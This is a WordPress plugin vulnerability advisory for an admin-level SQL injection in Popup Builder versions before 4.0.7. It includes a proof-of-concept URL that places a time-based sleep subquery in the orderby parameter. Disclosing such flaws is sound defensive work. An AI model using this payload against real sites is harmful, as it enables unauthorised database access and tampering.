WordPress Plugin Vulnerabilities

Popup Builder < 4.0.7 - Admin+ SQL Injection

Description

The plugin does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection

Proof of Concept

https://example.com/wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(5)))b)&order=desc

Affects Plugins

Fixed in 4.0.7

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Tony Wu
Submitter
Tony Wu
Verified
Yes

Timeline

Publicly Published
2022-01-24 (about 2 years ago)
Added
2022-01-24 (about 2 years ago)
Last Updated
2022-04-10 (about 2 years ago)

Other